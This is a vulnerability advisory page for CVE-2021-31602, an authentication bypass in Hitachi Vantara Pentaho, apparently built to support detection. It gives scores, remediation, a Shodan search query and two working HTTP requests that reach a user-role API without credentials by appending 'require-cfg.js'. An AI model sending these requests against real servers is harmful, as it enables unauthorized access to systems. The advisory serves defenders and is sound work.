🔙 목록으로 돌아가기

CVE-2021-31602: Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass

TitleHitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass
Authorpussycat0x
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the server.
RemediationApply the latest security patches or updates provided by Hitachi Vantara to fix the authentication bypass vulnerability.
CVSS Score7.5
EPSS Score0.92774
CVE IDCVE-2021-31602
CWE IDCWE-287
Shodan QueryPentahopentaho
Tags cve2021 cve spring seclists pentaho auth-bypass hitachi vkev vuln

🔍 Vulnerability Description

Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x are vulnerable to authentication bypass. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.

🌐 HTTP Request

GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/620.32 (KHTML, like Gecko) Version/17.1.10 Safari/620.32
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-31602.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-31602.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A